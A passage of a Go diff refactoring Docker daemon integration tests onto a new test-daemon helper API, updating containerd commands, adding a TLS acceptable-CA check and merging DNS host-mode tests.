+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	c.Assert(d.StartWithError("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil)
+	expected := "syslog-address should be in form proto://address"
+	icmd.RunCommand("grep", expected, d.LogFileName()).Assert(c, icmd.Success)
 }
 
+// FIXME(vdemeester) should be a unit test
 func (s *DockerDaemonSuite) TestDaemonCorruptedFluentdAddress(c *check.C) {
-	c.Assert(s.d.Start("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil)
-	expected := "Failed to set log opts: invalid fluentd-address corrupted:c: "
-	runCmd := exec.Command("grep", expected, s.d.LogFileName())
-	if out, _, err := runCommandWithOutput(runCmd); err != nil {
-		c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err)
-	}
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	c.Assert(d.StartWithError("--log-driver=fluentd", "--log-opt", "fluentd-address=corrupted:c"), check.NotNil)
+	expected := "invalid fluentd-address corrupted:c: "
+	icmd.RunCommand("grep", expected, d.LogFileName()).Assert(c, icmd.Success)
 }
 
+// FIXME(vdemeester) Use a new daemon instance instead of the Suite one
 func (s *DockerDaemonSuite) TestDaemonStartWithoutHost(c *check.C) {
-	s.d.useDefaultHost = true
+	s.d.UseDefaultHost = true
 	defer func() {
-		s.d.useDefaultHost = false
+		s.d.UseDefaultHost = false
 	}()
-	c.Assert(s.d.Start(), check.IsNil)
+	s.d.Start(c)
 }
 
-func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) {
-	s.d.useDefaultTLSHost = true
+// FIXME(vdemeester) Use a new daemon instance instead of the Suite one
+func (s *DockerDaemonSuite) TestDaemonStartWithDefaultTLSHost(c *check.C) {
+	s.d.UseDefaultTLSHost = true
 	defer func() {
-		s.d.useDefaultTLSHost = false
+		s.d.UseDefaultTLSHost = false
 	}()
-	if err := s.d.Start(
+	s.d.Start(c,
 		"--tlsverify",
 		"--tlscacert", "fixtures/https/ca.pem",
 		"--tlscert", "fixtures/https/server-cert.pem",
-		"--tlskey", "fixtures/https/server-key.pem"); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+		"--tlskey", "fixtures/https/server-key.pem")
 
 	// The client with --tlsverify should also use default host localhost:2376
 	tmpHost := os.Getenv("DOCKER_HOST")
@@ -1854,6 +1741,33 @@ func (s *DockerDaemonSuite) TestDaemonStartWithDefalutTLSHost(c *check.C) {
 	if !strings.Contains(out, "Server") {
 		c.Fatalf("docker version should return information of server side")
 	}
+
+	// ensure when connecting to the server that only a single acceptable CA is requested
+	contents, err := ioutil.ReadFile("fixtures/https/ca.pem")
+	c.Assert(err, checker.IsNil)
+	rootCert, err := helpers.ParseCertificatePEM(contents)
+	c.Assert(err, checker.IsNil)
+	rootPool := x509.NewCertPool()
+	rootPool.AddCert(rootCert)
+
+	var certRequestInfo *tls.CertificateRequestInfo
+	conn, err := tls.Dial("tcp", fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort), &tls.Config{
+		RootCAs: rootPool,
+		GetClientCertificate: func(cri *tls.CertificateRequestInfo) (*tls.Certificate, error) {
+			certRequestInfo = cri
+			cert, err := tls.LoadX509KeyPair("fixtures/https/client-cert.pem", "fixtures/https/client-key.pem")
+			if err != nil {
+				return nil, err
+			}
+			return &cert, nil
+		},
+	})
+	c.Assert(err, checker.IsNil)
+	conn.Close()
+
+	c.Assert(certRequestInfo, checker.NotNil)
+	c.Assert(certRequestInfo.AcceptableCAs, checker.HasLen, 1)
+	c.Assert(certRequestInfo.AcceptableCAs[0], checker.DeepEquals, rootCert.RawSubject)
 }
 
 func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C) {
@@ -1863,14 +1777,13 @@ func (s *DockerDaemonSuite) TestBridgeIPIsExcludedFromAllocatorPool(c *check.C)
 	bridgeIP := "192.169.1.1"
 	bridgeRange := bridgeIP + "/30"
 
-	err := s.d.StartWithBusybox("--bip", bridgeRange)
-	c.Assert(err, check.IsNil)
-	defer s.d.Restart()
+	s.d.StartWithBusybox(c, "--bip", bridgeRange)
+	defer s.d.Restart(c)
 
 	var cont int
 	for {
 		contName := fmt.Sprintf("container%d", cont)
-		_, err = s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2")
+		_, err := s.d.Cmd("run", "--name", contName, "-d", "busybox", "/bin/sleep", "2")
 		if err != nil {
 			// pool exhausted
 			break
@@ -1893,38 +1806,29 @@ func (s *DockerDaemonSuite) TestDaemonNoSpaceLeftOnDeviceError(c *check.C) {
 	c.Assert(mount.MakeRShared(testDir), checker.IsNil)
 	defer mount.Unmount(testDir)
 
-	// create a 2MiB image and mount it as graph root
+	// create a 3MiB image (with a 2MiB ext4 fs) and mount it as graph root
 	// Why in a container? Because `mount` sometimes behaves weirdly and often fails outright on this test in debian:jessie (which is what the test suite runs under if run from the Makefile)
-	dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=2 count=0")
-	out, _, err := runCommandWithOutput(exec.Command("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img"))) // `mkfs.ext4` is not in busybox
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	cmd := exec.Command("losetup", "-f", "--show", filepath.Join(testDir, "testfs.img"))
-	loout, err := cmd.CombinedOutput()
-	c.Assert(err, checker.IsNil)
-	loopname := strings.TrimSpace(string(loout))
-	defer exec.Command("losetup", "-d", loopname).Run()
+	dockerCmd(c, "run", "--rm", "-v", testDir+":/test", "busybox", "sh", "-c", "dd of=/test/testfs.img bs=1M seek=3 count=0")
+	icmd.RunCommand("mkfs.ext4", "-F", filepath.Join(testDir, "testfs.img")).Assert(c, icmd.Success)
 
-	dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", fmt.Sprintf("mkdir -p /test/test-mount && mount -t ext4 -no loop,rw %v /test/test-mount", loopname))
+	dockerCmd(c, "run", "--privileged", "--rm", "-v", testDir+":/test:shared", "busybox", "sh", "-c", "mkdir -p /test/test-mount && mount -n /test/testfs.img /test/test-mount")
 	defer mount.Unmount(filepath.Join(testDir, "test-mount"))
 
-	err = s.d.Start("--graph", filepath.Join(testDir, "test-mount"))
-	defer s.d.Stop()
-	c.Assert(err, check.IsNil)
+	s.d.Start(c, "--data-root", filepath.Join(testDir, "test-mount"))
+	defer s.d.Stop(c)
 
-	// pull a repository large enough to fill the mount point
-	pullOut, err := s.d.Cmd("pull", "registry:2")
+	// pull a repository large enough to overfill the mounted filesystem
+	pullOut, err := s.d.Cmd("pull", "debian:stretch")
 	c.Assert(err, checker.NotNil, check.Commentf(pullOut))
 	c.Assert(pullOut, checker.Contains, "no space left on device")
 }
 
 // Test daemon restart with container links + auto restart
 func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
-	parent1Args := []string{}
-	parent2Args := []string{}
+	var parent1Args []string
+	var parent2Args []string
 	wg := sync.WaitGroup{}
 	maxChildren := 10
 	chErr := make(chan error, maxChildren)
@@ -1940,7 +1844,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) {
 		}
 
 		go func() {
-			_, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top")
+			_, err := s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top")
 			chErr <- err
 			wg.Done()
 		}()
@@ -1957,18 +1861,16 @@ func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) {
 	parent2Args = append([]string{"run", "-d"}, parent2Args...)
 	parent2Args = append(parent2Args, []string{"--name=parent2", "--restart=always", "busybox", "top"}...)
 
-	_, err = s.d.Cmd(parent1Args...)
+	_, err := s.d.Cmd(parent1Args...)
 	c.Assert(err, check.IsNil)
 	_, err = s.d.Cmd(parent2Args...)
 	c.Assert(err, check.IsNil)
 
-	err = s.d.Stop()
-	c.Assert(err, check.IsNil)
+	s.d.Stop(c)
 	// clear the log file -- we don't need any of it but may for the next part
 	// can ignore the error here, this is just a cleanup
 	os.Truncate(s.d.LogFileName(), 0)
-	err = s.d.Start()
-	c.Assert(err, check.IsNil)
+	s.d.Start(c)
 
 	for _, num := range []string{"1", "2"} {
 		out, err := s.d.Cmd("inspect", "-f", "{{ .State.Running }}", "parent"+num)
@@ -1986,13 +1888,12 @@ func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) {
 	cgroupParent := "test"
 	name := "cgroup-test"
 
-	err := s.d.StartWithBusybox("--cgroup-parent", cgroupParent)
-	c.Assert(err, check.IsNil)
-	defer s.d.Restart()
+	s.d.StartWithBusybox(c, "--cgroup-parent", cgroupParent)
+	defer s.d.Restart(c)
 
 	out, err := s.d.Cmd("run", "--name", name, "busybox", "cat", "/proc/self/cgroup")
 	c.Assert(err, checker.IsNil)
-	cgroupPaths := parseCgroupPaths(string(out))
+	cgroupPaths := ParseCgroupPaths(string(out))
 	c.Assert(len(cgroupPaths), checker.Not(checker.Equals), 0, check.Commentf("unexpected output - %q", string(out)))
 	out, err = s.d.Cmd("inspect", "-f", "{{.Id}}", name)
 	c.Assert(err, checker.IsNil)
@@ -2010,8 +1911,7 @@ func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) {
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows does not support links
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf(out))
@@ -2019,7 +1919,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) {
 	out, err = s.d.Cmd("run", "--name=test2", "--link", "test:abc", "busybox", "sh", "-c", "ping -c 1 -w 1 abc")
 	c.Assert(err, check.IsNil, check.Commentf(out))
 
-	c.Assert(s.d.Restart(), check.IsNil)
+	s.d.Restart(c)
 
 	// should fail since test is not running yet
 	out, err = s.d.Cmd("start", "test2")
@@ -2034,8 +1934,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) {
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows does not support links
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("create", "--name=test", "busybox")
 	c.Assert(err, check.IsNil, check.Commentf(out))
@@ -2047,7 +1946,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) {
 	out, err = s.d.Cmd("run", "-d", "--name=test3", "--link", "test2:abc", "busybox", "top")
 	test3ID := strings.TrimSpace(out)
 
-	c.Assert(s.d.Restart(), check.IsNil)
+	s.d.Restart(c)
 
 	out, err = s.d.Cmd("create", "--name=test", "busybox")
 	c.Assert(err, check.NotNil, check.Commentf("expected error trying to create container with duplicate name"))
@@ -2081,14 +1980,11 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) {
 
 // TestDaemonRestartWithKilledRunningContainer requires live restore of running containers
 func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check.C) {
-	// TODO(mlaventure): Not sure what would the exit code be on windows
 	testRequires(t, DaemonIsLinux)
-	if err := s.d.StartWithBusybox(); err != nil {
-		t.Fatal(err)
-	}
+	s.d.StartWithBusybox(t)
 
 	cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top")
-	defer s.d.Stop()
+	defer s.d.Stop(t)
 	if err != nil {
 		t.Fatal(cid, err)
 	}
@@ -2104,24 +2000,20 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check
 	}
 
 	// kill the container
-	runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", cid)
-	if out, ec, err := runCommandWithOutput(runCmd); err != nil {
-		t.Fatalf("Failed to run ctr, ExitCode: %d, err: '%v' output: '%s' cid: '%s'\n", ec, err, out, cid)
-	}
+	icmd.RunCommand(ctrBinary, "--address", "/var/run/docker/containerd/docker-containerd.sock",
+		"--namespace", moby_daemon.ContainersNamespace, "tasks", "kill", cid).Assert(t, icmd.Success)
 
 	// Give time to containerd to process the command if we don't
 	// the exit event might be received after we do the inspect
-	pidCmd := exec.Command("kill", "-0", pid)
-	_, ec, _ := runCommandWithOutput(pidCmd)
-	for ec == 0 {
+	result := icmd.RunCommand("kill", "-0", pid)
+	for result.ExitCode == 0 {
 		time.Sleep(1 * time.Second)
-		_, ec, _ = runCommandWithOutput(pidCmd)
+		// FIXME(vdemeester) should we check it doesn't error out ?
+		result = icmd.RunCommand("kill", "-0", pid)
 	}
 
 	// restart the daemon
-	if err := s.d.Start(); err != nil {
-		t.Fatal(err)
-	}
+	s.d.Start(t)
 
 	// Check that we've got the correct exit code
 	out, err := s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", cid)
@@ -2139,24 +2031,27 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check
 // them now, should remove the mounts.
 func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) {
 	testRequires(c, DaemonIsLinux)
-	c.Assert(s.d.StartWithBusybox("--live-restore"), check.IsNil)
+	s.d.StartWithBusybox(c, "--live-restore")
 
 	out, err := s.d.Cmd("run", "-d", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
 	id := strings.TrimSpace(out)
 
-	c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil)
+	// kill the daemon
+	c.Assert(s.d.Kill(), check.IsNil)
+
+	// Check if there are mounts with container id visible from the host.
+	// If not, those mounts exist in container's own mount ns, and so
+	// the following check for mounts being cleared is pointless.
+	skipMountCheck := false
 	mountOut, err := ioutil.ReadFile("/proc/self/mountinfo")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
-
-	// container mounts should exist even after daemon has crashed.
-	comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
-	c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment)
+	if !strings.Contains(string(mountOut), id) {
+		skipMountCheck = true
+	}
 
 	// restart daemon.
-	if err := s.d.Restart("--live-restore"); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Start(c, "--live-restore")
 
 	// container should be running.
 	out, err = s.d.Cmd("inspect", "--format={{.State.Running}}", id)
@@ -2170,23 +2065,23 @@ func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) {
 	out, err = s.d.Cmd("stop", id)
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
 
+	if skipMountCheck {
+		return
+	}
 	// Now, container mounts should be gone.
 	mountOut, err = ioutil.ReadFile("/proc/self/mountinfo")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
-	comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.Root, mountOut)
 	c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment)
 }
 
 // TestDaemonRestartWithUnpausedRunningContainer requires live restore of running containers.
 func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *check.C) {
-	// TODO(mlaventure): Not sure what would the exit code be on windows
 	testRequires(t, DaemonIsLinux)
-	if err := s.d.StartWithBusybox("--live-restore"); err != nil {
-		t.Fatal(err)
-	}
+	s.d.StartWithBusybox(t, "--live-restore")
 
 	cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top")
-	defer s.d.Stop()
+	defer s.d.Stop(t)
 	if err != nil {
 		t.Fatal(cid, err)
 	}
@@ -2208,9 +2103,10 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che
 	// resume the container
 	result := icmd.RunCommand(
 		ctrBinary,
-		"--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock",
-		"containers", "resume", cid)
-	t.Assert(result, icmd.Matches, icmd.Success)
+		"--address", "/var/run/docker/containerd/docker-containerd.sock",
+		"--namespace", moby_daemon.ContainersNamespace,
+		"tasks", "resume", cid)
+	result.Assert(t, icmd.Success)
 
 	// Give time to containerd to process the command if we don't
 	// the resume event might be received after we do the inspect
@@ -2220,9 +2116,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che
 	}, checker.Equals, 0)
 
 	// restart the daemon
-	if err := s.d.Start("--live-restore"); err != nil {
-		t.Fatal(err)
-	}
+	s.d.Start(t, "--live-restore")
 
 	// Check that we've got the correct status
 	out, err := s.d.Cmd("inspect", "-f", "{{.State.Status}}", cid)
@@ -2241,8 +2135,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che
 // this ensures that the old, pre gh#16032 functionality continues on
 func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows does not support links
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf(out))
@@ -2260,17 +2153,19 @@ func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) {
 	c.Assert(err, check.NotNil, check.Commentf(out))
 	c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received")
 
-	err = s.d.Restart()
-	c.Assert(err, check.IsNil)
+	s.d.Restart(c)
 	out, err = s.d.Cmd("start", "-a", "test2")
 	c.Assert(err, check.NotNil, check.Commentf(out))
 	c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received")
 }
 
 func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) {
-	testRequires(c, DaemonIsLinux, NotPpc64le)
+	testRequires(c, DaemonIsLinux)
 
-	infoLog := "\x1b[34mINFO\x1b"
+	infoLog := "\x1b[36mINFO\x1b"
+
+	b := bytes.NewBuffer(nil)
+	done := make(chan bool)
 
 	p, tty, err := pty.Open()
 	c.Assert(err, checker.IsNil)
@@ -2279,24 +2174,43 @@ func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) {
 		p.Close()
 	}()
 
-	b := bytes.NewBuffer(nil)
-	go io.Copy(b, p)
+	go func() {
+		io.Copy(b, p)
+		done <- true
+	}()
 
 	// Enable coloring explicitly
 	s.d.StartWithLogFile(tty, "--raw-logs=false")
-	s.d.Stop()
+	s.d.Stop(c)
+	// Wait for io.Copy() before checking output
+	<-done
 	c.Assert(b.String(), checker.Contains, infoLog)
 
 	b.Reset()
 
+	// "tty" is already closed in prev s.d.Stop(),
+	// we have to close the other side "p" and open another pair of
+	// pty for the next test.
+	p.Close()
+	p, tty, err = pty.Open()
+	c.Assert(err, checker.IsNil)
+
+	go func() {
+		io.Copy(b, p)
+		done <- true
+	}()
+
 	// Disable coloring explicitly
 	s.d.StartWithLogFile(tty, "--raw-logs=true")
-	s.d.Stop()
+	s.d.Stop(c)
+	// Wait for io.Copy() before checking output
+	<-done
+	c.Assert(b.String(), check.Not(check.Equals), "")
 	c.Assert(b.String(), check.Not(checker.Contains), infoLog)
 }
 
 func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) {
-	testRequires(c, DaemonIsLinux, NotPpc64le)
+	testRequires(c, DaemonIsLinux)
 
 	debugLog := "\x1b[37mDEBU\x1b"
 
@@ -2311,7 +2225,7 @@ func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) {
 	go io.Copy(b, p)
 
 	s.d.StartWithLogFile(tty, "--debug")
-	s.d.Stop()
+	s.d.Stop(c)
 	c.Assert(b.String(), checker.Contains, debugLog)
 }
 
@@ -2333,8 +2247,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) {
 
 	// --log-level needs to be set so that d.Start() doesn't add --debug causing
 	// a conflict with the config
-	err = s.d.Start("--config-file", configFilePath, "--log-level=info")
-	c.Assert(err, checker.IsNil)
+	s.d.Start(c, "--config-file", configFilePath, "--log-level=info")
 
 	// daemon config file
 	daemonConfig = `{
@@ -2351,7 +2264,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) {
 	_, err = configFile.Write([]byte(daemonConfig))
 	c.Assert(err, checker.IsNil)
 
-	err = s.d.reloadConfig()
+	err = s.d.ReloadConfig()
 	c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config"))
 
 	out, err := s.d.Cmd("info")
@@ -2363,8 +2276,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) {
 
 // Test for #21956
 func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) {
-	err := s.d.StartWithBusybox("--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514")
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c, "--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514")
 
 	out, err := s.d.Cmd("run", "-d", "--log-driver=json-file", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf(out))
@@ -2377,11 +2289,12 @@ func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) {
 
 // Test case for #20936, #22443
 func (s *DockerDaemonSuite) TestDaemonMaxConcurrency(c *check.C) {
-	c.Assert(s.d.Start("--max-concurrent-uploads=6", "--max-concurrent-downloads=8"), check.IsNil)
+	s.d.Start(c, "--max-concurrent-uploads=6", "--max-concurrent-downloads=8")
 
 	expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 6"`
 	expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"`
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
 }
@@ -2399,11 +2312,12 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) {
 	daemonConfig := `{ "max-concurrent-downloads" : 8 }`
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
-	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+	s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath))
 
 	expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"`
 	expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"`
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
 
@@ -2413,13 +2327,15 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) {
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
 
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
+	// unix.Kill(s.d.cmd.Process.Pid, unix.SIGHUP)
 
 	time.Sleep(3 * time.Second)
 
 	expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 7"`
 	expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 9"`
-	content, _ = ioutil.ReadFile(s.d.logFile.Name())
+	content, err = s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
 }
@@ -2437,11 +2353,12 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec
 	daemonConfig := `{ "max-concurrent-uploads" : null }`
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
-	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+	s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath))
 
 	expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"`
 	expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 3"`
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
 
@@ -2451,13 +2368,15 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
 
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
+	// unix.Kill(s.d.cmd.Process.Pid, unix.SIGHUP)
 
 	time.Sleep(3 * time.Second)
 
 	expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 1"`
 	expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"`
-	content, _ = ioutil.ReadFile(s.d.logFile.Name())
+	content, err = s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
 
@@ -2467,62 +2386,44 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec
 	fmt.Fprintf(configFile, "%s", daemonConfig)
 	configFile.Close()
 
-	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+	c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil)
 
 	time.Sleep(3 * time.Second)
 
 	expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 5"`
 	expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"`
-	content, _ = ioutil.ReadFile(s.d.logFile.Name())
+	content, err = s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads)
 	c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads)
 }
 
 func (s *DockerDaemonSuite) TestBuildOnDisabledBridgeNetworkDaemon(c *check.C) {
-	err := s.d.StartWithBusybox("-b=none", "--iptables=false")
-	c.Assert(err, check.IsNil)
-	s.d.c.Logf("dockerBinary %s", dockerBinary)
-	out, code, err := s.d.buildImageWithOut("busyboxs",
-		`FROM busybox
-                RUN cat /etc/hosts`, false)
-	comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", out, code, err)
-	c.Assert(err, check.IsNil, comment)
-	c.Assert(code, check.Equals, 0, comment)
+	s.d.StartWithBusybox(c, "-b=none", "--iptables=false")
+
+	result := cli.BuildCmd(c, "busyboxs", cli.Daemon(s.d),
+		build.WithDockerfile(`
+        FROM busybox
+        RUN cat /etc/hosts`),
+		build.WithoutCache,
+	)
+	comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", result.Combined(), result.ExitCode, result.Error)
+	c.Assert(result.Error, check.IsNil, comment)
+	c.Assert(result.ExitCode, check.Equals, 0, comment)
 }
 
 // Test case for #21976
-func (s *DockerDaemonSuite) TestDaemonDNSInHostMode(c *check.C) {
+func (s *DockerDaemonSuite) TestDaemonDNSFlagsInHostMode(c *check.C) {
 	testRequires(c, SameHostDaemon, DaemonIsLinux)
 
-	err := s.d.StartWithBusybox("--dns", "1.2.3.4")
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c, "--dns", "1.2.3.4", "--dns-search", "example.com", "--dns-opt", "timeout:3")
 
 	expectedOutput := "nameserver 1.2.3.4"
 	out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf")
 	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
-}
-
-// Test case for #21976
-func (s *DockerDaemonSuite) TestDaemonDNSSearchInHostMode(c *check.C) {
-	testRequires(c, SameHostDaemon, DaemonIsLinux)
-
-	err := s.d.StartWithBusybox("--dns-search", "example.com")
-	c.Assert(err, checker.IsNil)
-
-	expectedOutput := "search example.com"
-	out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	expectedOutput = "search example.com"
 	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
-}
-
-// Test case for #21976
-func (s *DockerDaemonSuite) TestDaemonDNSOptionsInHostMode(c *check.C) {
-	testRequires(c, SameHostDaemon, DaemonIsLinux)
-
-	err := s.d.StartWithBusybox("--dns-opt", "timeout:3")
-	c.Assert(err, checker.IsNil)
-
-	expectedOutput := "options timeout:3"
-	out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf")
